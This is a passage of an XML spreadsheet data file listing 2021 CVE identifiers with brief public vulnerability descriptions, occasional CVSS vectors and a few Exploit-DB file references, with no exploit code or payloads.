    <t>An issue was discovered in Xen 4.12.3 through 4.12.4 and 4.13.1 through 4.14.x. An x86 HVM guest with PCI pass through devices can force the allocation of all IDT vectors on the system by rebooting itself with MSI or MSI-X capabilities enabled and entries setup. Such reboots will leak any vectors used by the MSI(-X) entries that the guest might had enabled, and hence will lead to vector exhaustion on the system, not allowing further PCI pass through devices to work properly. HVM guests with PCI pass through devices can mount a Denial of Service (DoS) attack affecting the pass through of PCI devices to other guests or the hardware domain. In the latter case, this would affect the entire host.</t>
  </si>
  <si>
    <t>CVE-2021-33080</t>
  </si>
  <si>
    <t>Exposure of sensitive system information due to uncleared debug information in firmware for some Intel(R) SSD DC, Intel(R) Optane(TM) SSD and Intel(R) Optane(TM) SSD DC Products may allow an unauthenticated user to potentially enable information disclosure or escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-33081</t>
  </si>
  <si>
    <t>CVE-2021-33082</t>
  </si>
  <si>
    <t>Sensitive information in resource not removed before reuse in firmware for some Intel(R) SSD and Intel(R) Optane(TM) SSD Products may allow an unauthenticated user to potentially enable information disclosure via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-33083</t>
  </si>
  <si>
    <t>Improper authentication in firmware for some Intel(R) SSD, Intel(R) Optane(TM) SSD, Intel(R) Optane(TM) SSD DC and Intel(R) SSD DC Products may allow an privileged user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33086</t>
  </si>
  <si>
    <t>Out-of-bounds write in firmware for some Intel(R) NUCs may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33087</t>
  </si>
  <si>
    <t>Improper authentication in the installer for the Intel(R) NUC M15 Laptop Kit Management Engine driver pack before version 15.0.10.1508 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33088</t>
  </si>
  <si>
    <t>Incorrect default permissions in the installer for the Intel(R) NUC M15 Laptop Kit Integrated Sensor Hub driver pack before version 5.4.1.4449 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33089</t>
  </si>
  <si>
    <t>Improper access control in the software installer for the Intel(R) NUC HDMI Firmware Update Tool for NUC8i3BE, NUC8i5BE, NUC8i7BE before version 1.78.4.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-3309</t>
  </si>
  <si>
    <t>packages/wekan-ldap/server/ldap.js in Wekan before 4.87 can process connections even though they are not authorized by the Certification Authority trust store,</t>
  </si>
  <si>
    <t>CVE-2021-33090</t>
  </si>
  <si>
    <t>Incorrect default permissionsin the software installer for the Intel(R) NUC HDMI Firmware Update Tool for NUC10i3FN, NUC10i5FN, NUC10i7FN before version 1.78.2.0.7 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33091</t>
  </si>
  <si>
    <t>Insecure inherited permissions in the installer for the Intel(R) NUC M15 Laptop Kit audio driver pack before version 1.3 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33092</t>
  </si>
  <si>
    <t>Incorrect default permissions in the installer for the Intel(R) NUC M15 Laptop Kit HID Event Filter driver pack before version 2.2.1.383 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33093</t>
  </si>
  <si>
    <t>Insecure inherited permissions in the installer for the Intel(R) NUC M15 Laptop Kit Serial IO driver pack before version 30.100.2104.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33094</t>
  </si>
  <si>
    <t>Insecure inherited permissions in the installer for the Intel(R) NUC M15 Laptop Kit Keyboard LED Service driver pack before version 1.0.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33095</t>
  </si>
  <si>
    <t>Unquoted search path in the installer for the Intel(R) NUC M15 Laptop Kit Keyboard LED Service driver pack before version 1.0.0.4 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33096</t>
  </si>
  <si>
    <t>Improper isolation of shared resources in network on chip for the Intel(R) 82599 Ethernet Controllers and Adapters may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33097</t>
  </si>
  <si>
    <t>Time-of-check time-of-use vulnerability in the Crypto API Toolkit for Intel(R) SGX may allow a privileged user to potentially enable escalation of privilege via network access.</t>
  </si>
  <si>
    <t>CVE-2021-33098</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) Ethernet ixgbe driver for Linux before version 3.17.3 may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-3310</t>
  </si>
  <si>
    <t>Western Digital My Cloud OS 5 devices before 5.10.122 mishandle Symbolic Link Following on SMB and AFP shares. This can lead to code execution and information disclosure (by reading local files).</t>
  </si>
  <si>
    <t>CVE-2021-33101</t>
  </si>
  <si>
    <t>Uncontrolled search path in the Intel(R) GPA software before version 21.2 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33103</t>
  </si>
  <si>
    <t>Unintended intermediary in the BIOS authenticated code module for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33105</t>
  </si>
  <si>
    <t>Out-of-bounds read in some Intel(R) Core(TM) processors with Radeon(TM) RX Vega M GL integrated graphics before version 21.10 may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33106</t>
  </si>
  <si>
    <t>Integer overflow in the Safestring library maintained by Intel(R) may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33107</t>
  </si>
  <si>
    <t>Insufficiently protected credentials in USB provisioning for Intel(R) AMT SDK before version 16.0.3, Intel(R) SCS before version 12.2 and Intel(R) MEBx before versions 11.0.0.0012, 12.0.0.0011, 14.0.0.0004 and 15.0.0.0004 may allow an unauthenticated user to potentially enable information disclosure via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-33108</t>
  </si>
  <si>
    <t>Improper input validation in the Intel(R) In-Band Manageability software before version 2.13.0 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-3311</t>
  </si>
  <si>
    <t>An issue was discovered in October through build 471. It reactivates an old session ID (which had been invalid after a logout) once a new login occurs. NOTE: this violates the intended Auth/Manager.php authentication behavior but, admittedly, is only relevant if an old session ID is known to an attacker.</t>
  </si>
  <si>
    <t>CVE-2021-33110</t>
  </si>
  <si>
    <t>Improper input validation for some Intel(R) Wireless Bluetooth(R) products and Killer(TM) Bluetooth(R) products in Windows 10 and 11 before version 22.80 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-33113</t>
  </si>
  <si>
    <t>Improper input validation for some Intel(R) PROSet/Wireless WiFi in multiple operating systems and Killer(TM) WiFi in Windows 10 and 11 may allow an unauthenticated user to potentially enable denial of service or information disclosure via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-33114</t>
  </si>
  <si>
    <t>Improper input validation for some Intel(R) PROSet/Wireless WiFi in multiple operating systems and Killer(TM) WiFi in Windows 10 and 11 may allow an authenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-33115</t>
  </si>
  <si>
    <t>Improper input validation for some Intel(R) PROSet/Wireless WiFi in UEFI may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-33117</t>
  </si>
  <si>
    <t>Improper access control for some 3rd Generation Intel(R) Xeon(R) Scalable Processors before BIOS version MR7, may allow a local attacker to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33118</t>
  </si>
  <si>
    <t>Improper access control in the software installer for the Intel(R) Serial IO driver for Intel(R) NUC 11 Gen before version 30.100.2104.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33119</t>
  </si>
  <si>
    <t>Improper access control in the Intel(R) RealSense(TM) DCM before version 20210625 may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-3312</t>
  </si>
  <si>
    <t>An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document.</t>
  </si>
  <si>
    <t>CVE-2021-33120</t>
  </si>
  <si>
    <t>Out of bounds read under complex microarchitectural condition in memory subsystem for some Intel Atom(R) Processors may allow authenticated user to potentially enable information disclosure or cause denial of service via network access.</t>
  </si>
  <si>
    <t>CVE-2021-33122</t>
  </si>
  <si>
    <t>Insufficient control flow management in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33123</t>
  </si>
  <si>
    <t>Improper access control in the BIOS authenticated code module for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33124</t>
  </si>
  <si>
    <t>Out-of-bounds write in the BIOS authenticated code module for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33126</t>
  </si>
  <si>
    <t>Improper access control in the firmware for some Intel(R) 700 and 722 Series Ethernet Controllers and Adapters before versions 8.5 and 1.5.5 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33128</t>
  </si>
  <si>
    <t>Improper access control in the firmware for some Intel(R) E810 Ethernet Controllers before version 1.6.0.6 may allow a privileged user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33129</t>
  </si>
  <si>
    <t>Incorrect default permissions in the software installer for the Intel(R) Advisor before version 2021.4.0 may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-3313</t>
  </si>
  <si>
    <t>Plone CMS until version 5.2.4 has a stored Cross-Site Scripting (XSS) vulnerability in the user fullname property and the file upload functionality. The user's input data is not properly encoded when being echoed back to the user. This data can be interpreted as executable code by the browser and allows an attacker to execute JavaScript in the context of the victim's browser if the victim opens a vulnerable page containing an XSS payload.</t>
  </si>
  <si>
    <t>CVE-2021-33130</t>
  </si>
  <si>
    <t>Insecure default variable initialization of Intel(R) RealSense(TM) ID Solution F450 before version 2.6.0.74 may allow an unauthenticated user to potentially enable information disclosure via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-33135</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption in the Linux kernel drivers for Intel(R) SGX may allow an authenticated user to potentially enable denial of service via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33137</t>
  </si>
  <si>
    <t>Out-of-bounds write in the Intel(R) Kernelflinger project may allow an authenticated user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33139</t>
  </si>
  <si>
    <t>Improper conditions check in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.100 may allow an authenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-3314</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Oracle GlassFish Server 3.1.2.18 and below allows /common/logViewer/logViewer.jsf XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-33147</t>
  </si>
  <si>
    <t>Improper conditions check in the Intel(R) IPP Crypto library before version 2021.2 may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33149</t>
  </si>
  <si>
    <t>Observable behavioral discrepancy in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-3315</t>
  </si>
  <si>
    <t>In JetBrains TeamCity before 2020.2.2, stored XSS on a tests page was possible.</t>
  </si>
  <si>
    <t>CVE-2021-33150</t>
  </si>
  <si>
    <t>Hardware allows activation of test or debug logic at runtime for some Intel(R) Trace Hub instances which may allow an unauthenticated user to potentially enable escalation of privilege via physical access.</t>
  </si>
  <si>
    <t>CVE-2021-33155</t>
  </si>
  <si>
    <t>Improper input validation in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.100 may allow an authenticated user to potentially enable denial of service via adjacent access.</t>
  </si>
  <si>
    <t>CVE-2021-33159</t>
  </si>
  <si>
    <t>Improper authentication in subsystem for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33164</t>
  </si>
  <si>
    <t>Improper access control in BIOS firmware for some Intel(R) NUCs before version INWHL357.0046 may allow a privileged user to potentially enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2021-33166</t>
  </si>
  <si>
    <t>Incorrect default permissions for the Intel(R) RXT for Chromebook application, all versions, may allow an authenticated user to potentially enable information disclosure via local access.</t>
  </si>
  <si>
    <t>CVE-2021-3317</t>
  </si>
  <si>
    <t>KLog Server through 2.4.1 allows authenticated command injection. async.php calls shell_exec() on the original value of the source parameter.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49511.py</t>
  </si>
  <si>
    <t>Klog Server 2.4.1 - Command Injection (Authenticated)</t>
  </si>
  <si>
    <t>2021-02-01</t>
  </si>
  <si>
    <t>CVE-2021-33175</t>
  </si>
  <si>
    <t>EMQ X Broker versions prior to 4.2.8 are vulnerable to a denial of service attack as a result of excessive memory consumption due to the handling of untrusted inputs. These inputs cause the message broker to consume large amounts of memory, resulting in the application being terminated by the operating system.</t>
  </si>
  <si>
    <t>CVE-2021-33176</t>
  </si>
  <si>
    <t>VerneMQ MQTT Broker versions prior to 1.12.0 are vulnerable to a denial of service attack as a result of excessive memory consumption due to the handling of untrusted inputs. These inputs cause the message broker to consume large amounts of memory, resulting in the application being terminated by the operating system.</t>
  </si>
  <si>
    <t>CVE-2021-33177</t>
  </si>
  <si>
    <t>The Bulk Modifications functionality in Nagios XI versions prior to 5.8.5 is vulnerable to SQL injection. Exploitation requires the malicious actor to be authenticated to the vulnerable system, but once authenticated they would be able to execute arbitrary sql queries.</t>
  </si>
  <si>
    <t>CVE-2021-33178</t>
  </si>
  <si>
    <t>The Manage Backgrounds functionality within NagVis versions prior to 1.9.29 is vulnerable to an authenticated path traversal vulnerability. Exploitation of this results in a malicious actor having the ability to arbitrarily delete files on the local system.</t>
  </si>
  <si>
    <t>CVE-2021-33179</t>
  </si>
  <si>
    <t>The general user interface in Nagios XI versions prior to 5.8.4 is vulnerable to authenticated reflected cross-site scripting. An authenticated victim, who accesses a specially crafted malicious URL, would unknowingly execute the attached payload.</t>
  </si>
  <si>
    <t>CVE-2021-3318</t>
  </si>
  <si>
    <t>attach/ajax.php in DzzOffice through 2.02.1 allows XSS via the editorid parameter.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49799.py</t>
  </si>
  <si>
    <t>DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>2021-04-23</t>
  </si>
  <si>
    <t>CVE-2021-33180</t>
  </si>
  <si>
    <t>Improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability in cgi component in Synology Media Server before 1.8.1-2876 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-33181</t>
  </si>
  <si>
    <t>Server-Side Request Forgery (SSRF) vulnerability in webapi component in Synology Video Station before 2.4.10-1632 allows remote authenticated users to send arbitrary request to intranet resources via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-33182</t>
  </si>
  <si>
    <t>Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in PDF Viewer component in Synology DiskStation Manager (DSM) before 6.2.4-25553 allows remote authenticated users to read limited files via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-33183</t>
  </si>
  <si>
    <t>Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability container volume management component in Synology Docker before 18.09.0-0515 allows local users to read or write arbitrary files via unspecified vectors.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2021-33184</t>
  </si>
  <si>
    <t>Server-Side request forgery (SSRF) vulnerability in task management component in Synology Download Station before 3.8.15-3563 allows remote authenticated users to read arbitrary files via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-33185</t>
  </si>
  <si>
    <t>SerenityOS contains a buffer overflow in the set_range test in TestBitmap which could allow attackers to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-33186</t>
  </si>
  <si>
    <t>SerenityOS in test-crypto.cpp contains a stack buffer overflow which could allow attackers to obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-3319</t>
  </si>
  <si>
    <t>DOS: Incorrect 802154 Frame Validation for Omitted Source / Dest Addresses. Zephyr versions &gt;= &gt; v2.4.0 contain NULL Pointer Dereference (CWE-476), Attempt to Access Child of a Non-structure Pointer (CWE-588). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-94jg-2p6q-5364</t>
  </si>
  <si>
    <t>CVE-2021-33190</t>
  </si>
  <si>
    <t>In Apache APISIX Dashboard version 2.6, we changed the default value of listen host to 0.0.0.0 in order to facilitate users to configure external network access. In the IP allowed list restriction, a risky function was used for the IP acquisition, which made it possible to bypass the network limit. At the same time, the default account and password are fixed.Ultimately these factors lead to the issue of security risks. This issue is fixed in APISIX Dashboard 2.6.1</t>
  </si>
  <si>
    <t>CVE-2021-33191</t>
  </si>
  <si>
    <t>From Apache NiFi MiNiFi C++ version 0.5.0 the c2 protocol implements an "agent-update" command which was designed to patch the application binary. This "patching" command defaults to calling a trusted binary, but might be modified to an arbitrary value through a "c2-update" command. Said command is then executed using the same privileges as the application binary. This was addressed in version 0.10.0</t>
  </si>
  <si>
    <t>CVE-2021-33192</t>
  </si>
  <si>
    <t>A vulnerability in the HTML pages of Apache Jena Fuseki allows an attacker to execute arbitrary javascript on certain page views. This issue affects Apache Jena Fuseki from version 2.0.0 to version 4.0.0 (inclusive).</t>
  </si>
  <si>
    <t>CVE-2021-33193</t>
  </si>
  <si>
    <t>A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.</t>
  </si>
  <si>
    <t>CVE-2021-33194</t>
  </si>
  <si>
    <t>golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.</t>
  </si>
  <si>
    <t>CVE-2021-33195</t>
  </si>
  <si>
    <t>Go before 1.15.13 and 1.16.x before 1.16.5 has functions for DNS lookups that do not validate replies from DNS servers, and thus a return value may contain an unsafe injection (e.g., XSS) that does not conform to the RFC1035 format.</t>
  </si>
  <si>
    <t>CVE-2021-33196</t>
  </si>
  <si>
    <t>In archive/zip in Go before 1.15.13 and 1.16.x before 1.16.5, a crafted file count (in an archive's header) can cause a NewReader or OpenReader panic.</t>
  </si>
  <si>
    <t>CVE-2021-33197</t>
  </si>
  <si>
    <t>In Go before 1.15.13 and 1.16.x before 1.16.5, some configurations of ReverseProxy (from net/http/httputil) result in a situation where an attacker is able to drop arbitrary headers.</t>
  </si>
  <si>
    <t>CVE-2021-33198</t>
  </si>
  <si>
    <t>In Go before 1.15.13 and 1.16.x before 1.16.5, there can be a panic for a large exponent to the math/big.Rat SetString or UnmarshalText method.</t>
  </si>
  <si>
    <t>CVE-2021-33199</t>
  </si>
  <si>
    <t>In Expression Engine before 6.0.3, addonIcon in Addons/file/mod.file.php relies on the untrusted input value of input-&gt;get('file') instead of the fixed file names of icon.png and icon.svg.</t>
  </si>
  <si>
    <t>CVE-2021-3320</t>
  </si>
  <si>
    <t>Type Confusion in 802154 ACK Frames Handling. Zephyr versions &gt;= v2.4.0 contain NULL Pointer Dereference (CWE-476). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-27r3-rxch-2hm7</t>
  </si>
  <si>
    <t>CVE-2021-33200</t>
  </si>
  <si>
    <t>kernel/bpf/verifier.c in the Linux kernel through 5.12.7 enforces incorrect limits for pointer arithmetic operations, aka CID-bb01a1bba579. This can be abused to perform out-of-bounds reads and writes in kernel memory, leading to local privilege escalation to root. In particular, there is a corner case where the off reg causes a masking direction change, which then results in an incorrect final aux-&gt;alu_limit.</t>
  </si>
  <si>
    <t>CVE-2021-33203</t>
  </si>
  <si>
    <t>Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is directory traversal outside of the template root directories.</t>
  </si>
  <si>
    <t>CVE-2021-33204</t>
  </si>
  <si>
    <t>In the pg_partman (aka PG Partition Manager) extension before 4.5.1 for PostgreSQL, arbitrary code execution can be achieved via SECURITY DEFINER functions because an explicit search_path is not set.</t>
  </si>
  <si>
    <t>CVE-2021-33205</t>
  </si>
  <si>
    <t>Western Digital EdgeRover before 0.25 has an escalation of privileges vulnerability where a low privileged user could load malicious content into directories with higher privileges, because of how Node.js is used. An attacker can gain admin privileges and carry out malicious activities such as creating a fake library and stealing user credentials.</t>
  </si>
  <si>
    <t>CVE-2021-33207</t>
  </si>
  <si>
    <t>The HTTP client in MashZone NextGen through 10.7 GA deserializes untrusted data when it gets an HTTP response with a 570 status code.</t>
  </si>
  <si>
    <t>CVE-2021-33208</t>
  </si>
  <si>
    <t>The "Register an Ehcache Configuration File" admin feature in MashZone NextGen through 10.7 GA allows XXE attacks via a malicious XML configuration file.</t>
  </si>
  <si>
    <t>CVE-2021-33209</t>
  </si>
  <si>
    <t>An issue was discovered in Fimer Aurora Vision before 2.97.10. The response to a failed login attempt discloses whether the username or password is wrong, helping an attacker to enumerate usernames. This can make a brute-force attack easier.</t>
  </si>
  <si>
    <t>CVE-2021-3321</t>
  </si>
  <si>
    <t>Integer Underflow in Zephyr in IEEE 802154 Fragment Reassembly Header Removal. Zephyr versions &gt;= &gt;=2.4.0 contain Integer Overflow to Buffer Overflow (CWE-680). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-w44j-66g7-xw99</t>
  </si>
  <si>
    <t>CVE-2021-33210</t>
  </si>
  <si>
    <t>An issue was discovered in Fimer Aurora Vision before 2.97.10. An attacker can (in the WebUI) obtain plant information without authentication by reading the response of APIs from a kiosk view of a plant.</t>
  </si>
  <si>
    <t>CVE-2021-33211</t>
  </si>
  <si>
    <t>A Directory Traversal vulnerability in the Unzip feature in Elements-IT HTTP Commander 5.3.3 allows remote authenticated users to write files to arbitrary directories via relative paths in ZIP archives.</t>
  </si>
  <si>
    <t>CVE-2021-33212</t>
  </si>
  <si>
    <t>A Cross-site scripting (XSS) vulnerability in the "View in Browser" feature in Elements-IT HTTP Commander 5.3.3 allows remote authenticated users to inject arbitrary web script or HTML via a crafted SVG image.</t>
  </si>
  <si>
    <t>CVE-2021-33213</t>
  </si>
  <si>
    <t>An SSRF vulnerability in the "Upload from URL" feature in Elements-IT HTTP Commander 5.3.3 allows remote authenticated users to retrieve HTTP and FTP files from the internal server network by inserting an internal address.</t>
  </si>
  <si>
    <t>CVE-2021-33214</t>
  </si>
  <si>
    <t>In HMS Ewon eCatcher through 6.6.4, weak filesystem permissions could allow malicious users to access files that could lead to sensitive information disclosure, modification of configuration files, or disruption of normal system operation.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2021-33215</t>
  </si>
  <si>
    <t>An issue was discovered in CommScope Ruckus IoT Controller 1.7.1.0 and earlier. The API allows Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2021-33216</t>
  </si>
  <si>
    <t>An issue was discovered in CommScope Ruckus IoT Controller 1.7.1.0 and earlier. An Undocumented Backdoor exists, allowing shell access via a developer account.</t>
  </si>
  <si>
    <t>CVE-2021-33217</t>
  </si>
  <si>
    <t>An issue was discovered in CommScope Ruckus IoT Controller 1.7.1.0 and earlier. The Web Application allows Arbitrary Read/Write actions by authenticated users. The API allows an HTTP POST of arbitrary content into any file on the filesystem as root.</t>
  </si>
  <si>
    <t>CVE-2021-33218</t>
  </si>
  <si>
    <t>An issue was discovered in CommScope Ruckus IoT Controller 1.7.1.0 and earlier. There are Hard-coded System Passwords that provide shell access.</t>
  </si>
  <si>
    <t>CVE-2021-33219</t>
  </si>
  <si>
    <t>An issue was discovered in CommScope Ruckus IoT Controller 1.7.1.0 and earlier. There are Hard-coded Web Application Administrator Passwords for the admin and nplus1user accounts.</t>
  </si>
  <si>
    <t>CVE-2021-3322</t>
  </si>
  <si>
    <t>Unexpected Pointer Aliasing in IEEE 802154 Fragment Reassembly in Zephyr. Zephyr versions &gt;= &gt;=2.4.0 contain NULL Pointer Dereference (CWE-476). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p86r-gc4r-4mq3</t>
  </si>
  <si>
    <t>CVE-2021-33220</t>
  </si>
  <si>
    <t>An issue was discovered in CommScope Ruckus IoT Controller 1.7.1.0 and earlier. Hard-coded API Keys exist.</t>
  </si>
  <si>
    <t>CVE-2021-33221</t>
  </si>
  <si>
    <t>An issue was discovered in CommScope Ruckus IoT Controller 1.7.1.0 and earlier. There are Unauthenticated API Endpoints.</t>
  </si>
  <si>
    <t>CVE-2021-3323</t>
  </si>
  <si>
    <t>Integer Underflow in 6LoWPAN IPHC Header Uncompression in Zephyr. Zephyr versions &gt;= &gt;=2.4.0 contain Integer Underflow (Wrap or Wraparound) (CWE-191). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-89j6-qpxf-pfpc</t>
  </si>
  <si>
    <t>CVE-2021-33231</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in New equipment page in EasyVista Service Manager 2018.1.181.1 allows remote attackers to run arbitrary code via the notes field.</t>
  </si>
  <si>
    <t>CVE-2021-33235</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in write_node in htmldoc through 1.9.11 allows attackers to cause a denial of service via htmldoc/htmldoc/html.cxx:588.</t>
  </si>
  <si>
    <t>CVE-2021-33236</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in write_header in htmldoc through 1.9.11 allows attackers to casue a denial of service via /htmldoc/htmldoc/html.cxx:273.</t>
  </si>
  <si>
    <t>CVE-2021-3325</t>
  </si>
  <si>
    <t>Monitorix 3.13.0 allows remote attackers to bypass Basic Authentication in a default installation (i.e., an installation without a hosts_deny option). This issue occurred because a new access-control feature was introduced without considering that some exiting installations became unsafe, upon an update to 3.13.0, unless the new feature was immediately configured.</t>
  </si>
  <si>
    <t>CVE-2021-33254</t>
  </si>
  <si>
    <t>An issue was discovered in src/http/httpLib.c in EmbedThis Appweb Community Edition 8.2.1, allows attackers to cause a denial of service via the stream paramter to the parseUri function.</t>
  </si>
  <si>
    <t>CVE-2021-33256</t>
  </si>
  <si>
    <t>** DISPUTED ** A CSV injection vulnerability on the login panel of ManageEngine ADSelfService Plus Version: 6.1 Build No: 6101 can be exploited by an unauthenticated user. The j_username parameter seems to be vulnerable and a reverse shell could be obtained if a privileged user exports "User Attempts Audit Report" as CSV file. Note: The vendor disputes this vulnerability, claiming "This is not a valid vulnerability in our ADSSP product. We don't see this as a security issue at our side."</t>
  </si>
  <si>
    <t>CVE-2021-33259</t>
  </si>
  <si>
    <t>Several web interfaces in D-Link DIR-868LW 1.12b have no authentication requirements for access, allowing for attackers to obtain users' DNS query history.</t>
  </si>
  <si>
    <t>CVE-2021-3326</t>
  </si>
  <si>
    <t>The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-33265</t>
  </si>
  <si>
    <t>D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function FUN_80046eb4 in /formSetPortTr. This vulnerability is triggered via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2021-33266</t>
  </si>
  <si>
    <t>D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function FUN_8004776c in /formVirtualApp. This vulnerability is triggered via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2021-33267</t>
  </si>
  <si>
    <t>D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function FUN_80034d60 in /formStaticDHCP. This vulnerability is triggered via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2021-33268</t>
  </si>
  <si>
